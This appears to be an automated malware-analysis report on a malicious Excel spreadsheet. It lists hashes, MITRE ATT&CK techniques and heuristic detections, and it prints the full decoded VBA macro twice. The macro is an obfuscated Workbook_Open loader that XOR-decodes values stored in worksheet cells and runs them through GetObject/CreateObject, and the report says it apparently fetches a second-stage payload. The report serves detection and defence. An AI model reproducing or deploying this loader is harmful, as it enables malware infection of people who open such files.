Office (OLE) / .XLS malware analysis — malicious · 6a35ca6a8e45f2ca

MALICIOUS

Office (OLE) / .XLS

41.0 KB Created: 2023-05-08 01:01:39 Authoring application: Microsoft Excel First seen: 2023-05-10

MD5: 3533540579de820ccd11e9027c2cbdc2 SHA-1: e25d656cbbbc327cca7813959a4d5dd87b36d250 SHA-256: 6a35ca6a8e45f2ca48f66a0fe264526abbf9719b83304aea82e47e8a75ba51dc

148 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1566.001 Spearphishing Attachment T1071.001 Web Protocols

The file is a malicious Excel spreadsheet containing VBA macros. The Workbook_Open macro is designed to execute obfuscated code. This code retrieves values from specific cells in the 'k513' sheet, which are likely used to construct a command to download and execute a second-stage payload. The use of CreateObject and GetObject within the macro indicates an attempt to interact with the system to run external code.

Heuristics 5

VBA macros detected medium 4 related findings OLE_VBA_MACROS

Document contains VBA macro code
CreateObject call high OLE_VBA_CREATEOBJ

CreateObject call
Matched line in script
```
GetObject(Determining).CreateObject(Naturally).Run SubmiSSionS, 0
```
GetObject call high OLE_VBA_GETOBJ

GetObject call
Matched line in script
```
GetObject(Determining).CreateObject(Naturally).Run SubmiSSionS, 0
```
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
Workbook_Open macro low OLE_VBA_WBOPEN

Workbook_Open macro
Matched line in script
```
                   Sub Workbook_Open()
```

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 4590 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	4590 bytes
SHA-256: `4603ba105978c2b51985c71a5456987007c8e9ea55fc51d09ab611baf1c60d07`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisWorkbook" Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Option Explicit Private Proxy As String Private PhiliP As String Private Mitchell As String Private PreParing As Object Private Sub Wanna() Dim Determining As String, SubmiSSionS As String, Naturally As String GoTo SubmiSSionS Resolve: Determining = Trembl(Proxy): SubmiSSionS = Trembl(PhiliP): Naturally = Trembl(Mitchell) GoTo Repeated SubmiSSionS: Proxy = Sheets("k513").Range("J109").Value: PhiliP = Sheets("k513").Range("G171").Value: Mitchell = Sheets("k513").Range("H198").Value GoTo Resolve Repeated: GetObject(Determining).CreateObject(Naturally).Run SubmiSSionS, 0 End Sub Sub Workbook_Open() GoTo Boundary Dim Brochure As String Brochure = InputBox("your name") Dim Coalition As String Coalition = InputBox("last name") MsgBox Brochure MsgBox Coalition Boundary: If Brochure = "" Then Wanna End If End Sub Private Function Trembl(ByVal Refine As String) As Variant Dim Florists As Long: Florists = 0: Dim Jelsoft() As Byte: Dim Roots() As Byte, AllocAtion As String, CruCial As Integer Roots = "xec12fe254" GoTo Barcelona LegisLature: Dim Coalition As String Coalition = InputBox("enter your age") MsgBox Coalition Celebrities: If Florists < UBound(Jelsoft) Then CruCial = Florists Mod (10) GoTo Determining SubmiSSionS: AllocAtion = AllocAtion & Chr(Jelsoft(Florists)) Florists = Florists + 1 GoTo Celebrities Else GoTo Netscape End If Choosing: MsgBox "error -67841" Dim Brochure As String Brochure = InputBox("") MsgBox Brochure Netscape: Trembl = AllocAtion Exit Function Barcelona: Jelsoft = Dimensional(Refine) GoTo Celebrities Determining: Jelsoft(Florists) = Abs(Jelsoft(Florists) Xor Roots(CruCial * 2)) GoTo SubmiSSionS End Function Private Function Dimensional(ByVal Choosing As String) As Variant Dim AllocAtion() As Byte, i As Long, CruCial As Integer i = 0: ReDim AllocAtion(0 To (Len(Choosing) / 2)) As Byte Brochure: If i < Len(Choosing) Then CruCial = CruCial + 1 AllocAtion(CruCial - 1) = Chr(14 + ((8 + 4) * 2)) & "H" & Mid(Choosing, i + 1, 2) i = i + 2 GoTo Brochure Else GoTo Coalition End If Coalition: Dimensional = AllocAtion End Function Attribute VB_Name = "Sheet1" Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True

SHA-256: 4603ba105978c2b51985c71a5456987007c8e9ea55fc51d09ab611baf1c60d07

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Option Explicit





             Private Proxy As String
Private PhiliP As String





                                            Private Mitchell As String






                                                        





          Private PreParing As Object








                                                                Private Sub Wanna()
Dim Determining As String, SubmiSSionS As String, Naturally As String
GoTo SubmiSSionS





           




Resolve:
Determining = Trembl(Proxy): SubmiSSionS = Trembl(PhiliP): Naturally = Trembl(Mitchell)
GoTo Repeated
SubmiSSionS:







                                                







                                                    Proxy = Sheets("k513").Range("J109").Value: PhiliP = Sheets("k513").Range("G171").Value: Mitchell = Sheets("k513").Range("H198").Value








                






                                            GoTo Resolve








             






Repeated:
GetObject(Determining).CreateObject(Naturally).Run SubmiSSionS, 0







                  End Sub





                   Sub Workbook_Open()
GoTo Boundary
Dim Brochure As String
Brochure = InputBox("your name")







                                        Dim Coalition As String








                                                







                                                                        Coalition = InputBox("last name")
MsgBox Brochure








                                                                MsgBox Coalition
Boundary:






                 If Brochure = "" Then
Wanna
End If
End Sub
Private Function Trembl(ByVal Refine As String) As Variant







                                        Dim Florists As Long: Florists = 0: Dim Jelsoft() As Byte: Dim Roots() As Byte, AllocAtion As String, CruCial As Integer







                                                                            Roots = "xec12fe254"
GoTo Barcelona
LegisLature:
Dim Coalition As String
Coalition = InputBox("enter your age")








            MsgBox Coalition
Celebrities:
If Florists < UBound(Jelsoft) Then
CruCial = Florists Mod (10)
GoTo Determining
SubmiSSionS:
AllocAtion = AllocAtion & Chr(Jelsoft(Florists))
Florists = Florists + 1
GoTo Celebrities





                                            Else
GoTo Netscape
End If
Choosing:







          MsgBox "error -67841"





                                            Dim Brochure As String
Brochure = InputBox("")





                                                                MsgBox Brochure
Netscape:








            Trembl = AllocAtion
Exit Function
Barcelona:
Jelsoft = Dimensional(Refine)







                                                            GoTo Celebrities







Determining:
Jelsoft(Florists) = Abs(Jelsoft(Florists) Xor Roots(CruCial * 2))







                                                            




                                                        




            GoTo SubmiSSionS





                 End Function
Private Function Dimensional(ByVal Choosing As String) As Variant
Dim AllocAtion() As Byte, i As Long, CruCial As Integer
i = 0: ReDim AllocAtion(0 To (Len(Choosing) / 2)) As Byte





Brochure:





                                                        If i < Len(Choosing) Then
CruCial = CruCial + 1
AllocAtion(CruCial - 1) = Chr(14 + ((8 + 4) * 2)) & "H" & Mid(Choosing, i + 1, 2)





             i = i + 2
GoTo Brochure







                 Else
GoTo Coalition
End If
Coalition:







           







                                                            Dimensional = AllocAtion
End Function

Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Open this report in the interactive analyzer, or submit your own file for analysis.